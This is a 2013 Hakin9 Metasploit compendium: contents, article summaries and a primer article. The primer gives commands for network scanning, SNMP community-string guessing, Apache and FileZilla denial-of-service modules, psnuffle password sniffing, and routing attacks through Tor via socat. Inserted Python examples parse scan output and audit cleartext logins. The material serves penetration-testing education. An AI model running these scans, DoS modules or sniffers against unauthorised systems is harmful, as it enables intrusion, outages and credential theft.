01/2013 (1)
team
Editor in Chief: Krzysztof Samborski
Editorial Advisory Board: John Webb, Marco Hermans, Gareth Watters
Proofreaders: Jeff Smith, Krzysztof Samborski
Special thanks to our Beta testers and Proofreaders who helped us with this issue. Our magazine would not exist without your assistance and expertise.
Publisher: Paweł Marciniak CEO: Ewa Dudzic
Production Director: Andrzej Kuca
Art. Director: Ireneusz Pogroszewski
DTP: Ireneusz Pogroszewski
Marketing Director: Krzysztof Samborski
Publisher: Software Press sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the highest quality of the magazine, the editors make no warranty, expressed or implied, concerning the results of the content’s usage. All trademarks presented in the magazine were used for informative purposes only.
DISCLAIMER!
The techniques described in our magazine may be used in private, local networks only. The editors hold no responsibility for the misuse of the techniques presented or any data loss.
Dear Readers,
You are going to read Metasploit Tutorials – Hakin9 Compendium. This compendium consists of the articles we collected through a couple of years plus the ones that are still fresh, waiting to be published for the first time. We hope that Metasploit, so often quoted and asked for in your messages to [email protected], becomes even more comprehensible for you after reading this issue.
We grouped the articles published in the issue into thematic sections. These are: A GUIDE TO METASPLOIT in which you can read about the basics of Metasploit, EXPLOITING WITH METASPLOIT where everybody can find useful tips about the usage of Metasploit, and TOOLS that consists of the articles on various tools and techniques boosting Metasploit.
We hope that these tutorials come in handy.
Regards,
Krzysztof Samborski
Product Manager of Hakin9 Magazine
A GUIDE TO METASPLOIT
Metasploit Primer
BY GEORGE KARPOUZAS
Metasploit is an entire framework that provides the necessary tools to identify flaws and run various exploits against a remote target machine during a penetration test. It simplifies network discovery and vulnerability verification, increasing the probability of success for your project. Today we will learn the basics of it.
Metasploit: An Introduction
BY MANASDEEP
Metasploit’s greatest advantage is that it is open source and freely extendable. You can customize it by including your own exploits and payloads as per your need. A security pentester can check the custom-made applications specific to an enterprise against his customized exploits and payloads. If a security researcher crafts a new attack, then a custom-made payload can carry out most of the attack purpose.
Cyber Attack Management with Metasploit
BY JOHN ‘JAY’ TRINCKES, JR
Armitage is a GUI interface for the Metasploit framework. The Metasploit Framework is a free, open source penetration testing solution. In the article John describes how to use Metasploit.
Cyber Attack Management with Armitage
BY ABHINAV SINGH
Metasploit has now become the industry standard product for penetration testing. Armitage leverages the functionality of Metasploit and provides a complete graphical interface to it. The article describes how to set up a penetration testing scenario using Armitage.
How to Use Metasploit for Security Defense
BY JUSTIN C. KLEIN KEANE
If you’ve ever taken any training about penetration testing, or read almost any book or online article about the trade, you’ve heard of Metasploit. Years ago, before penetration testing was a recognized professional field, exploiting a vulnerability was often an extremely onerous task. Identifying a vulnerability might be as easy as fingerprinting a system then searching public mailing lists, but finding exploit code was often difficult.
My Experiences with the Metasploit Framework: From N00b to Contributor
BY JOSHUA SMITH
Ever wanted a tour of the Metasploit Framework (MSF)? If you have basic command line skills, and a working knowledge of networking and how hosts are compromised, you can take a guided tour from someone who started as a tourist and ended up as a tour guide. You will see how you can use MSF for all sorts of tasks and learn to write your own magic for yourself or to share.
EXPLOITING WITH METASPLOIT
How to Penetrate with Metasploit? A Step-by-step Basic Pentesting Guide
BY ABDY MARTÍNEZ
Cybercriminals are knocking at doors, so we need to be prepared to protect our systems from them. The big question is how I am going to do this if I don’t know my system’s vulnerabilities. Pentesting is the answer. Now, how do I perform a cheap/free but powerful pentest on my system? Here is where Metasploit Community appears.
How To Exploit Windows 8 With Metasploit
BY AHMED SHERIF
In this article we’re going to learn how to exploit Windows 8 (Preview Build 8400) with a client-side attack technique; we’ll get a meterpreter session on the Windows 8 machine. The article is also meant for those who don’t yet know what the Metasploit project is.
How to Use Metasploit with Backtrack
BY VAHID SHOHOUHI
In this short tutorial of BackTrack, we will get to know an exploiting framework called Metasploit, which was created by the great HD Moore. Metasploit itself has a stand-alone version, “Metasploit Framework”, which is used by pros. BackTrack includes Metasploit too, but it doesn’t get updated with new modules, e.g. “Exploit Module”. At first we go through basic, yet main, definitions and parts inside of Metasploit. Our amigo has lots of features that could not be covered completely here; so we focus on the two big brothers: Payload & Meterpreter. Then we will practice one trick or two.
The Inside-Outsider – Leveraging Web Application Vulnerabilities + Metasploit to become the Ultimate Insider
BY ABHAY BHARGAV
An effective penetration test is one that has a specific objective. Typically, the objective is to identify and exploit as many vulnerabilities as can be found, within the scope of the rules of engagement. However, my interpretation of ‘objective’ is a little different. For me, being objective is really about whether I, as a penetration tester, can gain access to information assets that the organization considers critical. This means that whilst I might uncover several vulnerabilities during the course of a penetration test, if I am unable to gain access to the critical information assets of the organization, the fundamental objective is still not met.
Metasploit Fu Post Exploitation
BY HARSIMRAN WALIA
People always emphasize breaking into the system, the exploitation part. Once we are into a system, what should be done further? Post exploitation is rarely talked about, but it is as important as getting in. This article will mostly focus on some necessities and possibilities post exploitation of a system.
How to Use Metasploit for Penetration Testing
BY ANKHORUS CYBER SECURITY
When we say “Penetration Testing tool” the first thing that comes to our mind is the world’s largest Ruby project, initially started by HD Moore in 2003, called ‘Metasploit’, a sub-project of the Metasploit Project. Other important sub-projects include the Opcode Database, shellcode archive, and security research. It was created in 2003 in the Perl programming language, but due to some Perl disadvantages was completely re-written in the Ruby programming language in 2005. On October 21, 2009, Rapid7, a vulnerability management solution company, acquired the Metasploit Project.
A collaboration between the open source community and Rapid7, Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments, providing true security risk intelligence. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering.
How to Scan with Nessus from within Metasploit
BY MICHAEL BOMAN
When you perform a penetration test with Metasploit you sometimes import vulnerability scanning results from, for example, the Nessus Vulnerability Scanner. Usually you start the scan externally from the Metasploit Framework and then import the results into Metasploit. What you can do instead is manage the Nessus scan from within Metasploit and easily import the results into your process. But let’s start from the beginning.
How to Use Multiplayer Metasploit with Armitage
BY MICHAEL BOMAN
Metasploit is a very cool tool to use in your penetration testing: add Armitage for a really good time. Penetration test engagements are more and more often a collaborative effort with teams of talented security practitioners rather than a solo effort. Armitage is a scriptable red team (that is what the offensive security teams are called) collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.
TOOLS
Advance Meterpreter with API, Mixins and Railgun
BY ABHINAV SINGH
Meterpreter is considered the heart of Metasploit – it provides a wide range of features that can be performed during post exploitation. The main role of meterpreter is to make our penetration task easier and faster. In this tutorial we will talk about some of the advanced concepts related to meterpreter. We will dive deeper into the core of Metasploit to understand how meterpreter scripts function and how we can build our own scripts.
VMware vSphere Security and Metasploit Exploitation Framework
BY DUANE ANDERSON
VMware vSphere is another layer in your overall environment to attack. In this article you will learn some of the threats, how to mitigate them and how to attack that virtual layer.
Metasploit – How to Play with SMB and Authentication
BY GUGLIELMO SCAIOLA
In my experience a lot of infrastructures have two big problems: they use local admin credentials with the same password on some or all systems of the network, and they keep some servers (or clients) unpatched. With these two common mistakes we can completely pwn the infrastructure.
Two pillars of best practice are simply patching and a different local admin password for each host. It is possible to retrieve a lot of best practices from the Internet and from many books about security architecture, but a lot of system admins don’t use them. Why?
In most cases because the system admins are uneducated in security, or because they are lazy, or because they are too busy.
How to Bend Metasploit to Your Will
BY PATRICK FITZGERALD
Most articles on Metasploit cover what it is, what it does and how to use it. Essentially you can find out how to scan for vulnerable systems followed by how to select, configure and deploy an exploit against a vulnerable system. These are indispensable skills to anyone who wishes to use the framework in any capacity. The purpose of this article is to give those interested an insight into how to extend Metasploit to suit their own specific needs. This extensibility is where Metasploit is leagues ahead of the competing frameworks currently available.
How to Work with Metasploit Auxiliary Modules
BY ABHINAV SINGH
The Metasploit framework is based on a modular architecture. This means that all the exploits, payloads, encoders etc. are present in the form of modules. The biggest advantage of a modular architecture is that it is easier to extend the functionality of the framework based on requirements. Any programmer can develop his own module and port it easily into the framework.
How to use Sqlploit
BY GEORGE KARPOUZAS
Databases nowadays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information is stored in database servers that are often poorly secured. Someone with access to this information could have control over a company’s or an organization’s infrastructure.
How to Explore the IPv6 Attack Surface with Metasploit
BY MIKE SHEWARD
IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.
HAKIN9 EXTRA
How to Use The Mac OS X Hackers Toolbox
BY PHILLIP WYLIE
When you think of an operating system to run pen testing tools on, you probably think of Linux and more specifically BackTrack Linux. BackTrack Linux is a great option and one of the most common platforms for running pen testing tools. If you are a Mac user, then you would most likely run a virtual machine of BackTrack Linux. While this is a great option, sometimes it is nice to have your tools running on the native operating system of your computer.
A GUIDE TO METASPLOIT
Metasploit Primer
Metasploit is an entire framework that provides the necessary tools
to identify flaws and run various exploits against a remote target
machine during a penetration test. It simplifies network discovery
and vulnerability verification, increasing the probability of success
for your project. Today we will learn the basics of it.
Metasploit is one of the most popular tools in the field of information security and penetration testing. It includes fuzzing tools and not just exploits, so it can be used to discover software vulnerabilities. Metasploit has changed the way we perform penetration tests and has become the de facto framework for finding and exploiting application vulnerabilities. It is available for all popular operating systems and this has played an important role in the popularity of this great framework. Metasploit is not just a toolbox full of exploits. It contains various modules such as service scanners, port scanners, fuzzers and numerous post exploitation modules.
Anonymity First
Tor protects your anonymity by bouncing your communications around a distributed network of relays, run by volunteers all around the world. The primary purpose of Tor is to protect communications and improve privacy and security on the Internet. To remain anonymous we should launch our attacks through the Tor network using the Socat program. Socat is a command line utility that establishes two bidirectional byte streams and transfers data between them. Let us assume that the IP address of our target machine is 192.168.1.5. We run Socat in this way: socat TCP4-LISTEN:3333,fork SOCKS4a:127.0.0.1:192.168.1.5:80,socksport=9050.
The above command sets up a local Socat proxy listening on port 3333. Socat will forward all TCP traffic for 192.168.1.5:80 via the Tor SOCKS proxy that is listening on 127.0.0.1 on port 9050.
Launch attacks via Tor
Now, to launch your attacks via Tor and Socat and exploit your target machine at IP address 192.168.1.5, you have to set the target IP to 127.0.0.1 (RHOSTS) and the remote port to 3333 (RPORT).
Port Scanning
Nmap
Nmap is a free and open source tool for network discovery and security auditing. Nmap is able to determine what hosts are available on the network, what operating systems and services are running on the target hosts, and can identify the type of the firewalls that are in use along with dozens of other capabilities.
Import Nmap results into Metasploit
It is very helpful to scan your target with Nmap and import the results into Metasploit. All you have to do is scan your target using the -oX option to generate an XML file that will contain the results. To do this, execute the following nmap command, assuming that your target machine has the IP address 192.168.1.5: nmap -Pn -sS -A -oX scan.xml 192.168.1.5. Launch msfconsole, if you have not done so already, and import the results with this command: db_import scan.xml. To verify that the import was successful, use the hosts command to list all targeted hosts (Figure 1).
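What the import step actually reads from the -oX file, as an added example (not Metasploit's importer): a parser for the nmap XML elements that carry the host, port, service and OS data, with plain-text views in the spirit of the hosts and services commands. The XML document is a constructed sample shaped like nmap's output, not real scan data.

```python
"""Parse nmap -oX output into the host and service inventory that
msfconsole's hosts and services commands show after a db_import."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample of what `nmap -Pn -sS -A -oX scan.xml 192.168.1.5`
# emits, trimmed to the elements the parser reads (not real scan output).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -sS -A -oX scan.xml 192.168.1.5">
  <host>
    <status state="up" reason="user-set"/>
    <address addr="192.168.1.5" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <hostnames><hostname name="john.mydomain.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2" accuracy="98"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.1.6" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

Service = Tuple[int, str, str, str]  # port, protocol, state, service name


@dataclass
class Host:
    addr: str
    mac: Optional[str]
    hostname: Optional[str]
    os_name: Optional[str]
    services: List[Service] = field(default_factory=list)


def parse_nmap_xml(xml_text: str, include_closed: bool = False) -> List[Host]:
    """Return one Host per live IPv4 host, with its open ports (sorted)."""
    root = ET.fromstring(xml_text)
    hosts: List[Host] = []
    for h in root.iter("host"):
        status = h.find("status")
        if status is not None and status.get("state") != "up":
            continue  # down hosts carry no ports or OS data worth recording
        ipv4 = h.find("address[@addrtype='ipv4']")
        if ipv4 is None:
            continue
        mac = h.find("address[@addrtype='mac']")
        name = h.find("hostnames/hostname")
        osmatch = h.find("os/osmatch")  # nmap lists the best match first
        host = Host(
            addr=ipv4.get("addr"),
            mac=mac.get("addr") if mac is not None else None,
            hostname=name.get("name") if name is not None else None,
            os_name=osmatch.get("name") if osmatch is not None else None,
        )
        for port in h.findall("ports/port"):
            state = port.find("state").get("state")
            if state != "open" and not include_closed:
                continue
            service = port.find("service")
            host.services.append((int(port.get("portid")), port.get("protocol"),
                                  state, service.get("name") if service is not None else ""))
        host.services.sort()
        hosts.append(host)
    return hosts


def hosts_table(hosts: List[Host]) -> str:
    """Plain-text view in the spirit of the msfconsole hosts command."""
    rows = [f"{'address':<15} {'mac':<18} {'name':<22} os_name"]
    for h in hosts:
        rows.append(f"{h.addr:<15} {h.mac or '':<18} {h.hostname or '':<22} {h.os_name or ''}")
    return "\n".join(rows)


def services_table(hosts: List[Host]) -> str:
    """Plain-text view in the spirit of the msfconsole services command."""
    rows = [f"{'host':<15} {'port':<5} {'proto':<5} {'name':<14} state"]
    for h in hosts:
        for port, proto, state, name in h.services:
            rows.append(f"{h.addr:<15} {port:<5} {proto:<5} {name:<14} {state}")
    return "\n".join(rows)


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_XML)
    print(hosts_table(found))
    print()
    print(services_table(found))
```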
Run Nmap from msfconsole
You can also run Nmap from within msfconsole and have the results automatically stored into the database. To achieve this, run db_nmap -Pn -sS -A 192.168.1.5, assuming that your target machine’s IP address is 192.168.1.5. To verify that the results from the scan have been stored in the database, run hosts or services (Figure 2).
Figure 1. Hosts command result
Figure 2. Services command result
Port scanning with Metasploit auxiliary
Although Nmap is the de-facto port scanner and has become a synonym for port scanning, Metasploit offers its own port scanners. These port scanners are available in auxiliary modules. In msfconsole execute search portscan to see a list of all available port scanners in MSF (Figure 3).
Figure 3. Available port scanners in MSF 4.4.0
To select one of the available port scanners, let us say the tcp scanner, execute use auxiliary/scanner/portscan/tcp and type show options to see a list of available options. To set the target machine, execute set RHOSTS ip_address where ip_address is the IP address of your target machine. You can also increase the number of threads for faster port scanning. Set THREADS to 50 and run the scanner module by issuing the command run.
Idle Scanning with Nmap and Metasploit
Idle Scanning allows blind port scanning. We can scan a target without sending packets to the target from our own IP address while spoofing the IP address of another host on the network. Idle scanning allows us to be stealthy and allows us to discover IP-based trust relationships between machines. To achieve this type of scan we will need to locate a host that is idle on the network. Metasploit contains the module scanner/ip/ipidseq to scan for an idle host on the network. Let us run the scanner/ip/ipidseq module to discover an idle host on the net. Type:
• use auxiliary/scanner/ip/ipidseq
• set RHOSTS 192.168.238.0/24
• set THREADS 50
• run (Figure 4)
To scan host 192.168.238.100, for example, using the zombie PC at 192.168.238.200, we use nmap: nmap -Pn -sI 192.168.238.200 192.168.238.100.
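The decision ipidseq makes for each host, reimplemented in Python as an added example (not the module's own code): the classes and thresholds follow my reading of the Nmap/Metasploit ipidseq logic and are an assumption, and the sample IP ID sequences are constructed. Run it over IP IDs collected from your own hosts to find the ones that still use a global counter, which is the property that makes a host usable as someone else's zombie.

```python
"""Classify a host's IP ID sequence the way the ipidseq module reports it."""
from typing import List

# Constructed IP ID samples, as if read from six replies of one host each.
INCREMENTAL_HOST = [12001, 12002, 12003, 12004, 12005, 12006]
RANDOM_HOST = [40219, 3302, 61888, 17045, 29901, 54410]


def ip_id_diffs(ipids: List[int]) -> List[int]:
    """Forward differences modulo 2^16: the IP ID is a 16-bit counter that wraps."""
    return [(b - a) % 65536 for a, b in zip(ipids, ipids[1:])]


def classify_ipids(ipids: List[int]) -> str:
    if len(ipids) < 2:
        return "Unknown"
    diffs = ip_id_diffs(ipids)
    # A jump above 20000 within three or more samples is taken as a randomized
    # generator (a decreasing sequence wraps to a large diff and lands here too).
    if len(ipids) > 2 and any(d > 20000 for d in diffs):
        return "Randomized"
    if all(i == 0 for i in ipids):
        return "All zeros"
    constant = mul256 = incremental = True
    for d in diffs:
        # Big, non-byte-aligned jumps: random positive increments.
        if d > 1000 and (d % 256 != 0 or d >= 25600):
            return "Random positive increments"
        if d != 0:
            constant = False
        if d > 5120 or d % 256 != 0:
            mul256 = False  # counter kept in the high byte (byte-swapped field)
        if d >= 10:
            incremental = False
    if constant:
        return "Constant"
    if mul256:
        return "Broken little-endian incremental!"
    if incremental:
        return "Incremental!"
    return "Unknown"


def predictable_ip_id(ipids: List[int]) -> bool:
    """True when the host's IP ID is a plain counter. Such a host leaks its
    traffic volume and can serve as a third party's idle-scan zombie; the
    mitigation is per-destination or randomized IP ID generation."""
    return classify_ipids(ipids) in ("Incremental!", "Broken little-endian incremental!")


if __name__ == "__main__":
    for label, seq in (("incremental host", INCREMENTAL_HOST), ("random host", RANDOM_HOST)):
        print(f"{label}: {classify_ipids(seq)} (predictable={predictable_ip_id(seq)})")
```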
OS Fingerprinting with Metasploit
OS fingerprinting is the process of determining the operating system running on a host. Port 445 is used by the SMB protocol for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network. Most usage of SMB involves computers running Microsoft Windows. To check if port 445 is open use auxiliary/scanner/portscan/syn, set RHOSTS 192.168.1.5 and set PORTS 445 and run the module.
smb_version module
If port 445 is open then we are going to use the smb_version module. Type use scanner/smb/smb_version and set RHOSTS 192.168.1.5, assuming that your target machine has IP address 192.168.1.5. Type run and hit enter to get your results:
msf auxiliary(smb_version) > run
[*] 192.168.1.5:445 is running Windows XP Service Pack 2 (language: English) (name:JOHN) (domain:MYDOMAIN)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Voila! A Windows XP SP2 machine with lots of vulnerabilities. Execute the command hosts again to see that Metasploit has updated the database according to our new discovery.
Working with Scanners
Metasploit provides us with many scanning modules. To list the available scanners from within msfconsole, type info auxiliary/scanner/ or search scanner, and hit tab to discover that MSF has over 240 scanners available.
HTTP Scanning
There are many HTTP scanners available in Metasploit. We are going to use the http_version scanner. Select it: use auxiliary/scanner/http/http_version. Type show options for a list of available options.
msf auxiliary(http_version) > show options
Module options (auxiliary/scanner/http/http_version): see Listing 1.
Select your target host, set RHOSTS target_host_ip and run the module.
Microsoft SQL Server Discovery
To see a list of all modules relative to MS SQL, issue the command search mssql. Choose the mssql_ping module: use auxiliary/scanner/mssql/mssql_ping. To scan the whole network set RHOSTS 192.168.1.0/24, set THREADS 255 and run the module. Sit back and let Metasploit discover all MS SQL servers on the network.
MySQL Discovery
To find all MySQL auxiliary modules issue the command search mysql. Choose the mysql_version module: use auxiliary/scanner/mysql/mysql_version. To scan the whole network set RHOSTS 192.168.1.0/24, set THREADS 50 and run the module. Sit back and let Metasploit discover all of the MySQL servers and their versions!
FTP Scanning
FTP is an insecure protocol. FTP servers are one
of the easiest ways to get into a target network. Always check to see if anonymous access is allowed whenever you encounter an open FTP port. To check for anonymous access, issue the command use auxiliary/scanner/ftp/anonymous, set the options appropriately and run the module. To identify the FTP version, there is a suitable module called ftp_version. Type use auxiliary/scanner/ftp/ftp_version to use it.
SSH Scanning
SSH is a very secure protocol although there are vulnerabilities in various implementations and you should determine which version is running on the target. You can use the ssh_version module to determine the SSH version running on the target server. To choose the ssh_version module, use auxiliary/scanner/ssh/ssh_version and set RHOSTS and THREADS accordingly.
SNMP Enumeration and Login
SNMP is typically used with network devices to report information. As a result, there is a chance to find information about a specific system by enumerating the SNMP port. If you can find a Cisco device running and can get the read/write SNMP community string, you can actually download the entire device configuration, modify it, and upload your own malicious configuration back to the device.
Metasploit comes with a built-in auxiliary module specifically for sweeping SNMP devices. If it is possible to guess the community strings, SNMP can allow anything from excessive information disclosure to full system compromise. To gain access to a switch, we have to guess its community strings. Execute the command use auxiliary/scanner/snmp/snmp_login, set RHOSTS to the target machine’s IP address and run the module. Other SNMP auxiliary modules are shown in Figure 5.
VNC Scanner
Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the RFB protocol to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction across a network. Imagine what control over the compromised machine you will have if you manage to find a VNC server with a default configuration or with no password at all. The VNC Authentication None Scanner scans an IP address or a range of IP addresses looking for targets that are running a VNC server without a password configured. To use the vnc scanner execute use auxiliary/scanner/vnc/vnc_none_auth, set RHOSTS to an IP range (for example 192.168.1.0/24) and run the module. Do not forget to increase the number of threads if you are scanning more than one target.
Open_X11 Scanner
The X Window System is a software system and network protocol that provides a basis for graphical user interfaces and rich input device capability for networked computers. Like VNC, if you find a host with X11 enabled with the default configuration, you will control the host completely. The open_x11 scanner module scans a target or multiple targets for X11 servers that will allow a user to connect without any authentication. To use the module, select the auxiliary module (auxiliary/scanner/x11/open_x11), define your options and run it.
Figure 5. SNMP auxiliary modules in MSF 4.4.0
Listing 1. Module options (auxiliary/scanner/http/http_version)
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Proxies                   no        Use a proxy chain
RHOSTS                    yes       The target address range or CIDR identifier
RPORT    80               yes       The target port
THREADS  1                yes       The number of concurrent threads
VHOST                     no        HTTP server virtual host
Host Discovery
Host discovery is the process of identifying live hosts on a network. A live host is any host that responds to a ping or has open ports.
ARP Scanning
ARP (Address Resolution Protocol) is a protocol used for the resolution of network layer addresses into link layer addresses. The ARP protocol is designed to be used for any link layer and network layer protocols. ARP is a non-routable protocol and can only be used between systems on the same Ethernet network. We can use the scanner module arp_sweep to discover and fingerprint IP hosts on the local network. To use it type use auxiliary/scanner/discovery/arp_sweep. Select the whole local network to scan, for example set RHOSTS 192.168.1.0/24, and run the module (Figure 6).
UDP Probe
With the User Datagram Protocol (UDP), applications can send messages or datagrams to other hosts on an Internet Protocol (IP) network. There is no guarantee of delivery, ordering or duplicate protection. UDP is suitable for purposes where error checking and correction is either not necessary or is performed in the application, avoiding the overhead of such processing at the network interface level. UDP is one of the most famous network protocols and it is widely used. Let us see how we can probe known UDP ports to discover live hosts on the network. Metasploit offers the module udp_probe to discover live hosts on the network by scanning an IP or a range of IPs for open UDP ports. To select it, type use auxiliary/scanner/discovery/udp_probe. Set the RHOSTS option and run the module to get a list of live hosts (Figure 7).
Denial of Service Attacks
A denial-of-service attack (DoS) is an attempt to make a machine or network resource unavailable to its intended users.
Apache HTTP Server
Apache httpd has been the most popular web server on the Internet since April 1996. It consists of thousands of lines of code and a vast variety of modules and extensions. Therefore, vulnerabilities could not be missing. The Apache extension mod_isapi implements the Internet Server extension API. It allows Internet Server extensions to be served by Apache for Windows. The Metasploit module apache_mod_isapi triggers a vulnerability in the Apache mod_isapi extension. In order to trigger this vulnerability, the target server must have an ISAPI module installed and configured. By making a request that terminates abnormally, mod_isapi will unload the ISAPI extension. Later, if another request comes for that ISAPI module, previously obtained pointers will be used, resulting in an access violation or potential arbitrary code execution. To use this module type use auxiliary/dos/http/apache_mod_isapi. Type show options to view a list of available options. After you have set the options, run the module (Figure 8).
Figure 6. arp_sweep module result
Figure 7. udp_probe module results
FileZilla FTP Server
FileZilla is open source FTP client and server software, distributed free of charge under the terms of the GNU General Public License. It is very popular software. Under Windows, FileZilla is commonly used as a server. Metasploit offers two auxiliary modules to perform DoS attacks against Windows hosts with FileZilla Server installed.
filezilla_admin_user
This module triggers a Denial of Service condition in the FileZilla FTP Server Administration Interface in versions 0.9.4d and earlier. To select it, type use auxiliary/dos/windows/ftp/filezilla_admin_user.
filezilla_server_port
This module triggers a Denial of Service condition in FileZilla FTP Server versions 0.9.21 and earlier. To select it, type use auxiliary/dos/windows/ftp/filezilla_server_port.
Password sniffing
A packet sniffer is a computer program that intercepts and logs traffic passing over a network. The sniffer captures each packet, decodes the packet's raw data, showing the values of various fields in the packet, and analyzes its content. If network communications are not encrypted, it is possible to intercept communications and capture passwords that are transmitted in plain text.
psnuffle
Metasploit has a password sniffing module named ‘psnuffle’ that can be used to sniff passwords off the wire, similar to the tool dsniff. It currently supports POP3, IMAP, FTP and HTTP GET. Using the ‘psnuffle’ module is extremely simple: just select it and run it. To select psnuffle, execute use auxiliary/sniffer/psnuffle. There are some options available. You can specify the filter string for capturing traffic, the name of the interface, the name of the PCAP capture file to process, a comma-delimited list of protocols, the number of bytes to capture and the number of seconds to wait for new data (Figure 9).
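The condition psnuffle depends on is that credentials cross the wire unencrypted. The following is an added example, not part of Metasploit or of this article, that audits captured client-to-server payloads (constructed here, as dsniff or psnuffle would decode them) for cleartext authentication on the same four protocols, reports the account and protocol with the secret redacted, and names the encrypted replacement for each:

```python
"""Audit captured traffic for cleartext authentication, the condition psnuffle
relies on. Added example (not Metasploit's code): it reports which protocols
and accounts sent credentials unencrypted, redacting the secret so the finding
can be shared, and names the encrypted alternative for each protocol."""
import base64
import re

# Constructed client-to-server payloads: (client, server, dst_port, payload).
SAMPLE_FLOWS = [
    ("10.0.0.7", "10.0.0.20", 21, "USER alice\r\nPASS hunter2\r\n"),
    ("10.0.0.7", "10.0.0.21", 110, "USER bob@example.test\r\nPASS s3cret\r\n"),
    ("10.0.0.8", "10.0.0.22", 143, 'a001 LOGIN carol "p@ss word"\r\n'),
    ("10.0.0.9", "10.0.0.23", 80,
     "GET /admin HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic "
     + base64.b64encode(b"dave:letmein").decode() + "\r\n\r\n"),
    ("10.0.0.9", "10.0.0.23", 80, "GET /index.html HTTP/1.1\r\nHost: intranet\r\n\r\n"),
]

# Destination port -> (protocol name as psnuffle uses it, encrypted replacement).
PORT_PROTO = {21: ("ftp", "FTPS or SFTP"), 110: ("pop3", "POP3S/STARTTLS"),
              143: ("imap", "IMAPS/STARTTLS"), 80: ("http", "HTTPS")}

def _ftp_pop3(payload):
    # Both protocols authenticate with a USER line followed by a PASS line.
    user = re.search(r"^USER (\S+)", payload, re.M)
    pw = re.search(r"^PASS (\S+)", payload, re.M)
    return (user.group(1), pw.group(1)) if user and pw else None

def _imap(payload):
    # "<tag> LOGIN <user> <password>"; the password may be a quoted string.
    m = re.search(r'^\S+ LOGIN (\S+) ("[^"]*"|\S+)', payload, re.M)
    return (m.group(1), m.group(2).strip('"')) if m else None

def _http_basic(payload):
    # HTTP Basic is base64 of "user:password", which is encoding, not encryption.
    m = re.search(r"^Authorization: Basic (\S+)", payload, re.M)
    if not m:
        return None
    try:
        creds = base64.b64decode(m.group(1)).decode("utf-8", "replace")
    except ValueError:
        return None
    user, _, pw = creds.partition(":")
    return (user, pw)

EXTRACTORS = {"ftp": _ftp_pop3, "pop3": _ftp_pop3, "imap": _imap, "http": _http_basic}

def find_cleartext_auth(flows):
    """Return one finding per flow that carried credentials in the clear.
    The password itself is never stored, only its length."""
    findings = []
    for client, server, port, payload in flows:
        if port not in PORT_PROTO:
            continue
        proto, fix = PORT_PROTO[port]
        creds = EXTRACTORS[proto](payload)
        if creds:
            user, pw = creds
            findings.append({"client": client, "server": server, "protocol": proto,
                             "user": user, "secret_len": len(pw), "remediation": fix})
    return findings

if __name__ == "__main__":
    for f in find_cleartext_auth(SAMPLE_FLOWS):
        print(f"{f['protocol']:5} {f['client']} -> {f['server']} user={f['user']} "
              f"secret={'*' * f['secret_len']}  fix: {f['remediation']}")
```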
Vulnerability Scanning
A vulnerability scanner is an automated computer program designed to assess computers, networks or applications to look for weaknesses. The program probes a system by sending data to it and analyzing the responses received. To identify any vulnerabilities on the target system, a vulnerability scanner uses its vulnerability database as a reference. Do not forget that vulnerability scanners create a lot of traffic on a network and are not suitable if one of your objectives is to remain undetected.
WMAP – Web Vulnerability Scanner
WMAP is a web vulnerability scanner integrated with Metasploit. First of all, we have to load the wmap plugin by issuing the command load wmap. To perform your web scan, follow these steps:
• Add a new target URL: wmap_sites -a http://192.168.1.5
• Add the site as a target: wmap_targets -t http://192.168.1.5
• List the modules that will be used to scan the remote system: wmap_run -t
• Scan the target system: wmap_run -e
• Check to see if WMAP found anything interesting: execute hosts -c address,svcs,vulns
• If WMAP found any vulnerabilities, issue the command vulns to get more details
Figure 8. apache_mod_isapi options
Figure 9. psnuffle sniffing traffic
Nexpose Vulnerability Scanner
To import a Nexpose vulnerability scan report, you have to import the Nexpose XML file into the MSF database. To import the XML file, enter import followed by the report filename, for example import /root/my_nexpose_scan.xml. To verify that the scanned host and vulnerability data was imported properly, enter hosts -c address,svcs,vulns. Enter vulns to view the details of the discovered vulnerabilities (Figure 10).
Nexpose plugin
There is a Nexpose plugin for Metasploit to run Nexpose from msfconsole. To perform a vulnerability scan with Nexpose you have to:
• Load the Nexpose plugin: load nexpose
• If you need help, enter help
• Connect to your Nexpose server: nexpose_connect username:password@host[:port]
• Launch a new scan with nexpose_scan followed by the target IP address, for example nexpose_scan 192.168.1.5
• Enter hosts -c address,svcs,vulns to view the results
• Execute vulns to view details for the discovered vulnerabilities
Nessus Vulnerability Scanner
To import a Nessus vulnerability scan report, you have to download it first by selecting your report and hitting download. Download the report in .nessus format. To import the .nessus results file, enter import followed by the report filename, for example import /root/nessus_report_ftp_target.nessus. To verify that the scanned hosts and vulnerability data were imported properly, enter hosts -c address,svcs,vulns to see if the target IP addresses, detected services and vulnerabilities detected by Nessus are in the list. As we did with WMAP, enter vulns to view details for the discovered vulnerabilities.
